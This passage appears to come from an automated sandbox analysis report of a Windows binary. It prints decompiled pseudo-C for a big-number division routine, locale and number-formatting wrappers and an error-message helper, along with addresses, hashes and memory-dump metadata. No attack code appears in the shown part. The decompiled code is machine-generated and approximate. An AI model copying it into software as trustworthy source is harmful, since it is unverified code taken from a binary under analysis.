                                            • Associated: 00000000.00000002.366145247.0000000000C30000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366184433.0000000000C62000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366201007.0000000000C6D000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366208271.0000000000C74000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366214716.0000000000C90000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366222190.0000000000C91000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID:
                                            • String ID: .
                                            • API String ID: 0-248832578
                                            • Opcode ID: 2c66b13323b4c16f7723dcaaf7800984b143e0bd44f69d043683f8205d49793d
                                            • Instruction ID: a71601f5cbcf515e824f9535a9dd2835806340d68d32caf6c6e7d8b93803a901
                                            • Opcode Fuzzy Hash: 2c66b13323b4c16f7723dcaaf7800984b143e0bd44f69d043683f8205d49793d
                                            • Instruction Fuzzy Hash: C7310B75900249BFCB248E75CC84EFB7B7DDF85315F000298F829D7191E6309E898B50
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00C5C0B0, Relevance: 3.5, APIs: 2, Instructions: 464COMMONCrypto
                                            Download Yara Rule
                                            C-Code - Quality: 90%
                                            			E00C5C0B0(signed int* _a4, signed int* _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int* _v80;
				char _v540;
				signed int _v544;
				signed int _t197;
				signed int _t198;
				signed int* _t200;
				signed int _t201;
				signed int _t204;
				signed int _t206;
				signed int _t208;
				signed int _t209;
				signed int _t213;
				signed int _t219;
				intOrPtr _t225;
				void* _t228;
				signed int _t230;
				signed int _t247;
				signed int _t250;
				void* _t253;
				signed int _t256;
				signed int* _t262;
				signed int _t263;
				signed int _t264;
				void* _t265;
				intOrPtr* _t266;
				signed int _t267;
				signed int _t269;
				signed int _t270;
				signed int _t271;
				signed int _t272;
				signed int* _t274;
				signed int* _t278;
				signed int _t279;
				signed int _t280;
				intOrPtr _t282;
				void* _t286;
				signed char _t292;
				signed int _t295;
				signed int _t303;
				signed int _t306;
				signed int _t307;
				signed int _t309;
				signed int _t311;
				signed int _t313;
				intOrPtr* _t314;
				signed int _t318;
				signed int _t322;
				signed int* _t328;
				signed int _t330;
				signed int _t331;
				signed int _t333;
				void* _t334;
				signed int _t336;
				signed int _t338;
				signed int _t341;
				signed int _t342;
				signed int* _t344;
				signed int _t349;
				signed int _t351;
				void* _t355;
				signed int _t359;
				signed int _t360;
				signed int _t362;
				signed int* _t368;
				signed int* _t369;
				signed int* _t370;
				signed int* _t373;

				_t262 = _a4;
				_t197 =  *_t262;
				if(_t197 != 0) {
					_t328 = _a8;
					_t267 =  *_t328;
					__eflags = _t267;
					if(_t267 != 0) {
						_t3 = _t197 - 1; // -1
						_t349 = _t3;
						_t4 = _t267 - 1; // -1
						_t198 = _t4;
						_v16 = _t349;
						__eflags = _t198;
						if(_t198 != 0) {
							__eflags = _t198 - _t349;
							if(_t198 > _t349) {
								L23:
								__eflags = 0;
								return 0;
							} else {
								_t46 = _t198 + 1; // 0x0
								_t306 = _t349 - _t198;
								_v60 = _t46;
								_t269 = _t349;
								__eflags = _t349 - _t306;
								if(_t349 < _t306) {
									L21:
									_t306 = _t306 + 1;
									__eflags = _t306;
								} else {
									_t368 =  &(_t262[_t349 + 1]);
									_t341 =  &(( &(_t328[_t269 - _t306]))[1]);
									__eflags = _t341;
									while(1) {
										__eflags =  *_t341 -  *_t368;
										if( *_t341 !=  *_t368) {
											break;
										}
										_t269 = _t269 - 1;
										_t341 = _t341 - 4;
										_t368 = _t368 - 4;
										__eflags = _t269 - _t306;
										if(_t269 >= _t306) {
											continue;
										} else {
											goto L21;
										}
										goto L22;
									}
									_t369 = _a8;
									_t54 = (_t269 - _t306) * 4; // 0xfc23b5a
									__eflags =  *((intOrPtr*)(_t369 + _t54 + 4)) -  *((intOrPtr*)(_t262 + 4 + _t269 * 4));
									if( *((intOrPtr*)(_t369 + _t54 + 4)) <  *((intOrPtr*)(_t262 + 4 + _t269 * 4))) {
										goto L21;
									}
								}
								L22:
								__eflags = _t306;
								if(__eflags != 0) {
									_t330 = _v60;
									_t200 = _a8;
									_t351 =  *(_t200 + _t330 * 4);
									_t64 = _t330 * 4; // 0xffffe9e5
									_t201 =  *((intOrPtr*)(_t200 + _t64 - 4));
									_v36 = _t201;
									asm("bsr eax, esi");
									_v56 = _t351;
									if(__eflags == 0) {
										_t270 = 0x20;
									} else {
										_t270 = 0x1f - _t201;
									}
									_v40 = _t270;
									_v64 = 0x20 - _t270;
									__eflags = _t270;
									if(_t270 != 0) {
										_t292 = _v40;
										_v36 = _v36 << _t292;
										_v56 = _t351 << _t292 | _v36 >> _v64;
										__eflags = _t330 - 2;
										if(_t330 > 2) {
											_t79 = _t330 * 4; // 0xe850ffff
											_t81 =  &_v36;
											 *_t81 = _v36 |  *(_a8 + _t79 - 8) >> _v64;
											__eflags =  *_t81;
										}
									}
									_v76 = 0;
									_t307 = _t306 + 0xffffffff;
									__eflags = _t307;
									_v32 = _t307;
									if(_t307 < 0) {
										_t331 = 0;
										__eflags = 0;
									} else {
										_t85 =  &(_t262[1]); // 0x4
										_v20 =  &(_t85[_t307]);
										_t206 = _t307 + _t330;
										_t90 = _t262 - 4; // -4
										_v12 = _t206;
										_t278 = _t90 + _t206 * 4;
										_v80 = _t278;
										do {
											__eflags = _t206 - _v16;
											if(_t206 > _v16) {
												_t207 = 0;
												__eflags = 0;
											} else {
												_t207 = _t278[2];
											}
											__eflags = _v40;
											_t311 = _t278[1];
											_t279 =  *_t278;
											_v52 = _t207;
											_v44 = 0;
											_v8 = _t207;
											_v24 = _t279;
											if(_v40 > 0) {
												_t318 = _v8;
												_t336 = _t279 >> _v64;
												_t230 = E00C4DDA0(_t311, _v40, _t318);
												_t279 = _v40;
												_t207 = _t318;
												_t311 = _t336 | _t230;
												_t359 = _v24 << _t279;
												__eflags = _v12 - 3;
												_v8 = _t318;
												_v24 = _t359;
												if(_v12 >= 3) {
													_t279 = _v64;
													_t360 = _t359 |  *(_t262 + (_v60 + _v32) * 4 - 8) >> _t279;
													__eflags = _t360;
													_t207 = _v8;
													_v24 = _t360;
												}
											}
											_t208 = E00C60DE0(_t311, _t207, _v56, 0);
											_v44 = _t262;
											_t263 = _t208;
											_v44 = 0;
											_t209 = _t311;
											_v8 = _t263;
											_v28 = _t209;
											_t333 = _t279;
											_v72 = _t263;
											_v68 = _t209;
											__eflags = _t209;
											if(_t209 != 0) {
												L40:
												_t264 = _t263 + 1;
												asm("adc eax, 0xffffffff");
												_t333 = _t333 + E00C4DDC0(_t264, _t209, _v56, 0);
												asm("adc esi, edx");
												_t263 = _t264 | 0xffffffff;
												_t209 = 0;
												__eflags = 0;
												_v44 = 0;
												_v8 = _t263;
												_v72 = _t263;
												_v28 = 0;
												_v68 = 0;
											} else {
												__eflags = _t263 - 0xffffffff;
												if(_t263 > 0xffffffff) {
													goto L40;
												}
											}
											__eflags = 0;
											if(0 <= 0) {
												if(0 < 0) {
													goto L44;
												} else {
													__eflags = _t333 - 0xffffffff;
													if(_t333 <= 0xffffffff) {
														while(1) {
															L44:
															_v8 = _v24;
															_t228 = E00C4DDC0(_v36, 0, _t263, _t209);
															__eflags = _t311 - _t333;
															if(__eflags < 0) {
																break;
															}
															if(__eflags > 0) {
																L47:
																_t209 = _v28;
																_t263 = _t263 + 0xffffffff;
																_v72 = _t263;
																asm("adc eax, 0xffffffff");
																_t333 = _t333 + _v56;
																__eflags = _t333;
																_v28 = _t209;
																asm("adc dword [ebp-0x28], 0x0");
																_v68 = _t209;
																if(_t333 == 0) {
																	__eflags = _t333 - 0xffffffff;
																	if(_t333 <= 0xffffffff) {
																		continue;
																	} else {
																	}
																}
															} else {
																__eflags = _t228 - _v8;
																if(_t228 <= _v8) {
																	break;
																} else {
																	goto L47;
																}
															}
															L51:
															_v8 = _t263;
															goto L52;
														}
														_t209 = _v28;
														goto L51;
													}
												}
											}
											L52:
											__eflags = _t209;
											if(_t209 != 0) {
												L54:
												_t280 = _v60;
												_t334 = 0;
												_t355 = 0;
												__eflags = _t280;
												if(_t280 != 0) {
													_t266 = _v20;
													_t219 =  &(_a8[1]);
													__eflags = _t219;
													_v24 = _t219;
													_v16 = _t280;
													do {
														_v44 =  *_t219;
														_t225 =  *_t266;
														_t286 = _t334 + _v72 * _v44;
														asm("adc esi, edx");
														_t334 = _t355;
														_t355 = 0;
														__eflags = _t225 - _t286;
														if(_t225 < _t286) {
															_t334 = _t334 + 1;
															asm("adc esi, esi");
														}
														 *_t266 = _t225 - _t286;
														_t266 = _t266 + 4;
														_t219 = _v24 + 4;
														_t164 =  &_v16;
														 *_t164 = _v16 - 1;
														__eflags =  *_t164;
														_v24 = _t219;
													} while ( *_t164 != 0);
													_t263 = _v8;
													_t280 = _v60;
												}
												__eflags = 0 - _t355;
												if(__eflags <= 0) {
													if(__eflags < 0) {
														L63:
														__eflags = _t280;
														if(_t280 != 0) {
															_t338 = _t280;
															_t314 = _v20;
															_t362 =  &(_a8[1]);
															__eflags = _t362;
															_t265 = 0;
															do {
																_t282 =  *_t314;
																_t172 = _t362 + 4; // 0xa6a5959
																_t362 = _t172;
																_t314 = _t314 + 4;
																asm("adc eax, eax");
																 *((intOrPtr*)(_t314 - 4)) = _t282 +  *((intOrPtr*)(_t362 - 4)) + _t265;
																asm("adc eax, 0x0");
																_t265 = 0;
																_t338 = _t338 - 1;
																__eflags = _t338;
															} while (_t338 != 0);
															_t263 = _v8;
														}
														_t263 = _t263 + 0xffffffff;
														asm("adc dword [ebp-0x18], 0xffffffff");
													} else {
														__eflags = _v52 - _t334;
														if(_v52 < _t334) {
															goto L63;
														}
													}
												}
												_t213 = _v12 - 1;
												__eflags = _t213;
												_v16 = _t213;
											} else {
												__eflags = _t263;
												if(_t263 != 0) {
													goto L54;
												}
											}
											_t331 = 0 + _t263;
											asm("adc esi, 0x0");
											_v20 = _v20 - 4;
											_t313 = _v32 - 1;
											_t262 = _a4;
											_t278 = _v80 - 4;
											_t206 = _v12 - 1;
											_v76 = _t331;
											_v32 = _t313;
											_v80 = _t278;
											_v12 = _t206;
											__eflags = _t313;
										} while (_t313 >= 0);
									}
									_t309 = _v16 + 1;
									_t204 = _t309;
									__eflags = _t204 -  *_t262;
									if(_t204 <  *_t262) {
										_t191 = _t204 + 1; // 0xc5d6cd
										_t274 =  &(_t262[_t191]);
										do {
											 *_t274 = 0;
											_t194 =  &(_t274[1]); // 0x91850fc2
											_t274 = _t194;
											_t204 = _t204 + 1;
											__eflags = _t204 -  *_t262;
										} while (_t204 <  *_t262);
									}
									 *_t262 = _t309;
									__eflags = _t309;
									if(_t309 != 0) {
										while(1) {
											_t271 =  *_t262;
											__eflags = _t262[_t271];
											if(_t262[_t271] != 0) {
												goto L78;
											}
											_t272 = _t271 + 0xffffffff;
											__eflags = _t272;
											 *_t262 = _t272;
											if(_t272 != 0) {
												continue;
											}
											goto L78;
										}
									}
									L78:
									return _t331;
								} else {
									goto L23;
								}
							}
						} else {
							_t6 =  &(_t328[1]); // 0xfc23b5a
							_t295 =  *_t6;
							_v44 = _t295;
							__eflags = _t295 - 1;
							if(_t295 != 1) {
								__eflags = _t349;
								if(_t349 != 0) {
									_t342 = 0;
									_v12 = 0;
									_v8 = 0;
									_v20 = 0;
									__eflags = _t349 - 0xffffffff;
									if(_t349 != 0xffffffff) {
										_t250 = _v16 + 1;
										__eflags = _t250;
										_v32 = _t250;
										_t373 =  &(_t262[_t349 + 1]);
										do {
											_t253 = E00C60DE0( *_t373, _t342, _t295, 0);
											_v68 = _t303;
											_t373 = _t373 - 4;
											_v20 = _t262;
											_t342 = _t295;
											_t303 = 0 + _t253;
											asm("adc ecx, 0x0");
											_v12 = _t303;
											_t34 =  &_v32;
											 *_t34 = _v32 - 1;
											__eflags =  *_t34;
											_v8 = _v12;
											_t295 = _v44;
										} while ( *_t34 != 0);
										_t262 = _a4;
									}
									_v544 = 0;
									_t41 =  &(_t262[1]); // 0x4
									_t370 = _t41;
									 *_t262 = 0;
									E00C5AA64(_t370, 0x1cc,  &_v540, 0);
									_t247 = _v20;
									__eflags = 0 - _t247;
									 *_t370 = _t342;
									_t262[2] = _t247;
									asm("sbb ecx, ecx");
									__eflags =  ~0x00000000;
									 *_t262 = 0xbadbae;
									return _v12;
								} else {
									_t14 =  &(_t262[1]); // 0x4
									_t344 = _t14;
									_v544 = 0;
									 *_t262 = 0;
									E00C5AA64(_t344, 0x1cc,  &_v540, 0);
									_t256 = _t262[1];
									_t322 = _t256 % _v44;
									__eflags = 0 - _t322;
									 *_t344 = _t322;
									asm("sbb ecx, ecx");
									__eflags = 0;
									 *_t262 =  ~0x00000000;
									return _t256 / _v44;
								}
							} else {
								_t9 =  &(_t262[1]); // 0x4
								_v544 = _t198;
								 *_t262 = _t198;
								E00C5AA64(_t9, 0x1cc,  &_v540, _t198);
								__eflags = 0;
								return _t262[1];
							}
						}
					} else {
						__eflags = 0;
						return 0;
					}
				} else {
					return _t197;
				}
			}























































































                                            0x00c5c0bc
                                            0x00c5c0bf
                                            0x00c5c0c3
                                            0x00c5c0cd
                                            0x00c5c0d0
                                            0x00c5c0d2
                                            0x00c5c0d4
                                            0x00c5c0e1
                                            0x00c5c0e1
                                            0x00c5c0e4
                                            0x00c5c0e4
                                            0x00c5c0e7
                                            0x00c5c0ea
                                            0x00c5c0ec
                                            0x00c5c21f
                                            0x00c5c221
                                            0x00c5c26a
                                            0x00c5c26e
                                            0x00c5c274
                                            0x00c5c223
                                            0x00c5c225
                                            0x00c5c228
                                            0x00c5c22a
                                            0x00c5c22d
                                            0x00c5c22f
                                            0x00c5c231
                                            0x00c5c265
                                            0x00c5c265
                                            0x00c5c265
                                            0x00c5c233
                                            0x00c5c238
                                            0x00c5c23e
                                            0x00c5c23e
                                            0x00c5c241
                                            0x00c5c243
                                            0x00c5c245
                                            0x00000000
                                            0x00000000
                                            0x00c5c247
                                            0x00c5c248
                                            0x00c5c24b
                                            0x00c5c24e
                                            0x00c5c250
                                            0x00000000
                                            0x00c5c252
                                            0x00000000
                                            0x00c5c252
                                            0x00000000
                                            0x00c5c250
                                            0x00c5c254
                                            0x00c5c25b
                                            0x00c5c25f
                                            0x00c5c263
                                            0x00000000
                                            0x00000000
                                            0x00c5c263
                                            0x00c5c266
                                            0x00c5c266
                                            0x00c5c268
                                            0x00c5c275
                                            0x00c5c278
                                            0x00c5c27b
                                            0x00c5c27e
                                            0x00c5c27e
                                            0x00c5c282
                                            0x00c5c285
                                            0x00c5c288
                                            0x00c5c28b
                                            0x00c5c296
                                            0x00c5c28d
                                            0x00c5c292
                                            0x00c5c292
                                            0x00c5c2a0
                                            0x00c5c2a5
                                            0x00c5c2a8
                                            0x00c5c2aa
                                            0x00c5c2b4
                                            0x00c5c2b7
                                            0x00c5c2be
                                            0x00c5c2c1
                                            0x00c5c2c4
                                            0x00c5c2cc
                                            0x00c5c2d2
                                            0x00c5c2d2
                                            0x00c5c2d2
                                            0x00c5c2d2
                                            0x00c5c2c4
                                            0x00c5c2d7
                                            0x00c5c2de
                                            0x00c5c2de
                                            0x00c5c2e1
                                            0x00c5c2e4
                                            0x00c5c516
                                            0x00c5c516
                                            0x00c5c2ea
                                            0x00c5c2ea
                                            0x00c5c2f0
                                            0x00c5c2f3
                                            0x00c5c2f6
                                            0x00c5c2f9
                                            0x00c5c2fc
                                            0x00c5c2ff
                                            0x00c5c302
                                            0x00c5c302
                                            0x00c5c305
                                            0x00c5c30c
                                            0x00c5c30c
                                            0x00c5c307
                                            0x00c5c307
                                            0x00c5c307
                                            0x00c5c30e
                                            0x00c5c312
                                            0x00c5c315
                                            0x00c5c317
                                            0x00c5c31a
                                            0x00c5c321
                                            0x00c5c324
                                            0x00c5c327
                                            0x00c5c332
                                            0x00c5c335
                                            0x00c5c33a
                                            0x00c5c33f
                                            0x00c5c346
                                            0x00c5c34b
                                            0x00c5c34d
                                            0x00c5c34f
                                            0x00c5c353
                                            0x00c5c356
                                            0x00c5c359
                                            0x00c5c361
                                            0x00c5c36a
                                            0x00c5c36a
                                            0x00c5c36c
                                            0x00c5c36f
                                            0x00c5c36f
                                            0x00c5c359
                                            0x00c5c379
                                            0x00c5c37e
                                            0x00c5c383
                                            0x00c5c385
                                            0x00c5c388
                                            0x00c5c38a
                                            0x00c5c38d
                                            0x00c5c390
                                            0x00c5c392
                                            0x00c5c395
                                            0x00c5c398
                                            0x00c5c39a
                                            0x00c5c3a1
                                            0x00c5c3a6
                                            0x00c5c3a9
                                            0x00c5c3b3
                                            0x00c5c3b5
                                            0x00c5c3b7
                                            0x00c5c3ba
                                            0x00c5c3ba
                                            0x00c5c3bc
                                            0x00c5c3bf
                                            0x00c5c3c2
                                            0x00c5c3c5
                                            0x00c5c3c8
                                            0x00c5c39c
                                            0x00c5c39c
                                            0x00c5c39f
                                            0x00000000
                                            0x00000000
                                            0x00c5c39f
                                            0x00c5c3cb
                                            0x00c5c3cd
                                            0x00c5c3cf
                                            0x00000000
                                            0x00c5c3d1
                                            0x00c5c3d1
                                            0x00c5c3d4
                                            0x00c5c3d6
                                            0x00c5c3d6
                                            0x00c5c3e4
                                            0x00c5c3e7
                                            0x00c5c3ec
                                            0x00c5c3ee
                                            0x00000000
                                            0x00000000
                                            0x00c5c3f0
                                            0x00c5c3f7
                                            0x00c5c3f7
                                            0x00c5c3fa
                                            0x00c5c3fd
                                            0x00c5c400
                                            0x00c5c403
                                            0x00c5c403
                                            0x00c5c406
                                            0x00c5c409
                                            0x00c5c40d
                                            0x00c5c410
                                            0x00c5c412
                                            0x00c5c415
                                            0x00000000
                                            0x00000000
                                            0x00c5c417
                                            0x00c5c415
                                            0x00c5c3f2
                                            0x00c5c3f2
                                            0x00c5c3f5
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00c5c3f5
                                            0x00c5c41c
                                            0x00c5c41c
                                            0x00000000
                                            0x00c5c41c
                                            0x00c5c419
                                            0x00000000
                                            0x00c5c419
                                            0x00c5c3d4
                                            0x00c5c3cf
                                            0x00c5c41f
                                            0x00c5c41f
                                            0x00c5c421
                                            0x00c5c42b
                                            0x00c5c42b
                                            0x00c5c42e
                                            0x00c5c430
                                            0x00c5c432
                                            0x00c5c434
                                            0x00c5c439
                                            0x00c5c43c
                                            0x00c5c43c
                                            0x00c5c43f
                                            0x00c5c442
                                            0x00c5c445
                                            0x00c5c447
                                            0x00c5c45c
                                            0x00c5c45e
                                            0x00c5c460
                                            0x00c5c462
                                            0x00c5c464
                                            0x00c5c466
                                            0x00c5c468
                                            0x00c5c46a
                                            0x00c5c46d
                                            0x00c5c46d
                                            0x00c5c471
                                            0x00c5c473
                                            0x00c5c479
                                            0x00c5c47c
                                            0x00c5c47c
                                            0x00c5c47c
                                            0x00c5c480
                                            0x00c5c480
                                            0x00c5c485
                                            0x00c5c488
                                            0x00c5c488
                                            0x00c5c48d
                                            0x00c5c48f
                                            0x00c5c491
                                            0x00c5c498
                                            0x00c5c498
                                            0x00c5c49a
                                            0x00c5c49f
                                            0x00c5c4a1
                                            0x00c5c4a4
                                            0x00c5c4a4
                                            0x00c5c4a7
                                            0x00c5c4b0
                                            0x00c5c4b0
                                            0x00c5c4b2
                                            0x00c5c4b2
                                            0x00c5c4b7
                                            0x00c5c4bd
                                            0x00c5c4c1
                                            0x00c5c4c4
                                            0x00c5c4c7
                                            0x00c5c4c9
                                            0x00c5c4c9
                                            0x00c5c4c9
                                            0x00c5c4ce
                                            0x00c5c4ce
                                            0x00c5c4d1
                                            0x00c5c4d4
                                            0x00c5c493
                                            0x00c5c493
                                            0x00c5c496
                                            0x00000000
                                            0x00000000
                                            0x00c5c496
                                            0x00c5c491
                                            0x00c5c4db
                                            0x00c5c4db
                                            0x00c5c4dc
                                            0x00c5c423
                                            0x00c5c423
                                            0x00c5c425
                                            0x00000000
                                            0x00000000
                                            0x00c5c425
                                            0x00c5c4ec
                                            0x00c5c4f1
                                            0x00c5c4f4
                                            0x00c5c4f8
                                            0x00c5c4f9
                                            0x00c5c4fc
                                            0x00c5c4ff
                                            0x00c5c500
                                            0x00c5c503
                                            0x00c5c506
                                            0x00c5c509
                                            0x00c5c50c
                                            0x00c5c50c
                                            0x00c5c514
                                            0x00c5c51b
                                            0x00c5c51c
                                            0x00c5c51e
                                            0x00c5c520
                                            0x00c5c522
                                            0x00c5c525
                                            0x00c5c530
                                            0x00c5c530
                                            0x00c5c536
                                            0x00c5c536
                                            0x00c5c539
                                            0x00c5c53a
                                            0x00c5c53a
                                            0x00c5c530
                                            0x00c5c53e
                                            0x00c5c540
                                            0x00c5c542
                                            0x00c5c544
                                            0x00c5c544
                                            0x00c5c546
                                            0x00c5c54a
                                            0x00000000
                                            0x00000000
                                            0x00c5c54c
                                            0x00c5c54c
                                            0x00c5c54f
                                            0x00c5c551
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00c5c551
                                            0x00c5c544
                                            0x00c5c553
                                            0x00c5c55d
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00c5c268
                                            0x00c5c0f2
                                            0x00c5c0f2
                                            0x00c5c0f2
                                            0x00c5c0f5
                                            0x00c5c0f8
                                            0x00c5c0fb
                                            0x00c5c12c
                                            0x00c5c12e
                                            0x00c5c179
                                            0x00c5c17b
                                            0x00c5c182
                                            0x00c5c189
                                            0x00c5c18c
                                            0x00c5c18f
                                            0x00c5c195
                                            0x00c5c195
                                            0x00c5c196
                                            0x00c5c199
                                            0x00c5c1a0
                                            0x00c5c1a9
                                            0x00c5c1ae
                                            0x00c5c1b1
                                            0x00c5c1b6
                                            0x00c5c1b9
                                            0x00c5c1bb
                                            0x00c5c1c0
                                            0x00c5c1c3
                                            0x00c5c1c6
                                            0x00c5c1c6
                                            0x00c5c1c6
                                            0x00c5c1ca
                                            0x00c5c1cd
                                            0x00c5c1cd
                                            0x00c5c1d2
                                            0x00c5c1d2
                                            0x00c5c1dd
                                            0x00c5c1e8
                                            0x00c5c1e8
                                            0x00c5c1eb
                                            0x00c5c1f7
                                            0x00c5c1fc
                                            0x00c5c207
                                            0x00c5c209
                                            0x00c5c20b
                                            0x00c5c211
                                            0x00c5c216
                                            0x00c5c218
                                            0x00c5c21e
                                            0x00c5c130
                                            0x00c5c13c
                                            0x00c5c13c
                                            0x00c5c13f
                                            0x00c5c14f
                                            0x00c5c155
                                            0x00c5c15c
                                            0x00c5c15e
                                            0x00c5c166
                                            0x00c5c168
                                            0x00c5c16a
                                            0x00c5c16f
                                            0x00c5c172
                                            0x00c5c178
                                            0x00c5c178
                                            0x00c5c0fd
                                            0x00c5c100
                                            0x00c5c104
                                            0x00c5c10a
                                            0x00c5c119
                                            0x00c5c123
                                            0x00c5c12b
                                            0x00c5c12b
                                            0x00c5c0fb
                                            0x00c5c0d6
                                            0x00c5c0d9
                                            0x00c5c0df
                                            0x00c5c0df
                                            0x00c5c0c5
                                            0x00c5c0cb
                                            0x00c5c0cb

                                            Memory Dump Source
                                            • Source File: 00000000.00000002.366151758.0000000000C31000.00000020.00020000.sdmp, Offset: 00C30000, based on PE: true
                                            • Associated: 00000000.00000002.366145247.0000000000C30000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366184433.0000000000C62000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366201007.0000000000C6D000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366208271.0000000000C74000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366214716.0000000000C90000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366222190.0000000000C91000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 0e50bbf9e4776493f77c5540494787f02e85b2eba5f0c0a8ffb8a0a8bb63874f
                                            • Instruction ID: e9f42d7d648fc00e05c65fbbf9c292fae0be959b5a97e48cad07bb548e4eb1b1
                                            • Opcode Fuzzy Hash: 0e50bbf9e4776493f77c5540494787f02e85b2eba5f0c0a8ffb8a0a8bb63874f
                                            • Instruction Fuzzy Hash: 25023C75E002199FDF14CFA9C8D06AEB7F1FF88315F258169D929E7240D730AA85CB94
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00C49D99, Relevance: 3.0, APIs: 2, Instructions: 46COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 100%
                                            			E00C49D99(intOrPtr _a4, intOrPtr _a8, short* _a12, int _a16) {
				short _v104;
				short _v304;
				short* _t23;
				int _t24;

				if( *0xc6d610 == 0) {
					GetLocaleInfoW(0x400, 0xf,  &_v304, 0x64);
					 *0xc8de30 = _v304;
					 *0xc8de32 = 0;
					 *0xc6d610 = 0xc8de30;
				}
				E00C3F980(_a4, _a8,  &_v104, 0x32);
				_t23 = _a12;
				_t24 = _a16;
				 *_t23 = 0;
				GetNumberFormatW(0x400, 0,  &_v104, 0xc6d600, _t23, _t24);
				 *((short*)(_t23 + _t24 * 2 - 2)) = 0;
				return 0;
			}







                                            0x00c49db1
                                            0x00c49dbf
                                            0x00c49dcc
                                            0x00c49dd4
                                            0x00c49dda
                                            0x00c49dda
                                            0x00c49df0
                                            0x00c49df5
                                            0x00c49dfa
                                            0x00c49e04
                                            0x00c49e0e
                                            0x00c49e16
                                            0x00c49e21

                                            APIs
                                            • GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 00C49DBF
                                            • GetNumberFormatW.KERNEL32 ref: 00C49E0E
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.366151758.0000000000C31000.00000020.00020000.sdmp, Offset: 00C30000, based on PE: true
                                            • Associated: 00000000.00000002.366145247.0000000000C30000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366184433.0000000000C62000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366201007.0000000000C6D000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366208271.0000000000C74000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366214716.0000000000C90000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366222190.0000000000C91000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: FormatInfoLocaleNumber
                                            • String ID:
                                            • API String ID: 2169056816-0
                                            • Opcode ID: c8322360c56b5dd52870e2006d2469e00776a45abe7338cf4cf1e5202f63ad96
                                            • Instruction ID: 88868e0b4b2a6eae426f9a3a01b0361033add2f2a54943d32f032e0c22c90187
                                            • Opcode Fuzzy Hash: c8322360c56b5dd52870e2006d2469e00776a45abe7338cf4cf1e5202f63ad96
                                            • Instruction Fuzzy Hash: 0C017175610308BBDB209FA5DC45FAF77BCEF09710F004422FA09972A0D3B0992487A5
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00C36D06, Relevance: 3.0, APIs: 2, Instructions: 17windowCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 79%
                                            			E00C36D06(WCHAR* _a4, long _a8) {
				long _t3;
				signed int _t5;

				_t3 = GetLastError();
				if(_t3 == 0) {
					return 0;
				}
				_t5 = FormatMessageW(0x1200, 0, _t3, 0x400, _a4, _a8, 0);
				asm("sbb eax, eax");
				return  ~( ~_t5);
			}





                                            0x00c36d06
                                            0x00c36d0e
                                            0x00000000
                                            0x00c36d35
                                            0x00c36d27
                                            0x00c36d2f
                                            0x00000000

                                            APIs
                                            • GetLastError.KERNEL32(00C40DE0,?,00000200), ref: 00C36D06
                                            • FormatMessageW.KERNEL32(00001200,00000000,00000000,00000400,?,?,00000000), ref: 00C36D27
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.366151758.0000000000C31000.00000020.00020000.sdmp, Offset: 00C30000, based on PE: true
                                            • Associated: 00000000.00000002.366145247.0000000000C30000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366184433.0000000000C62000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366201007.0000000000C6D000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366208271.0000000000C74000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366214716.0000000000C90000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366222190.0000000000C91000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: ErrorFormatLastMessage
                                            • String ID:
                                            • API String ID: 3479602957-0
                                            • Opcode ID: 927742cb171689422dff46b7fbe27aa3de48071879da51fbd3088836ae11c635
                                            • Instruction ID: 0e4bdeda024d9787bcfe8d7ce727a79fe391bdc971e17c527449f28010a1df5d
                                            • Opcode Fuzzy Hash: 927742cb171689422dff46b7fbe27aa3de48071879da51fbd3088836ae11c635
                                            • Instruction Fuzzy Hash: FAD0C971398702BEFA210F718C0AF2AB795B755B82F20C904B356EA0E0D6B09014DA29
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00C60654, Relevance: 1.8, APIs: 1, Instructions: 269COMMONCrypto
                                            Download Yara Rule
                                            C-Code - Quality: 100%
                                            			E00C60654(long _a4, signed int* _a8, signed char _a12, signed int _a16, intOrPtr* _a20, unsigned int* _a24, intOrPtr _a28) {
				signed int _t172;
				signed int _t175;
				signed int _t178;
				signed int* _t179;
				signed int _t195;
				signed int _t199;
				signed int _t202;
				void* _t203;
				void* _t206;
				signed int _t209;
				void* _t210;
				signed int _t225;
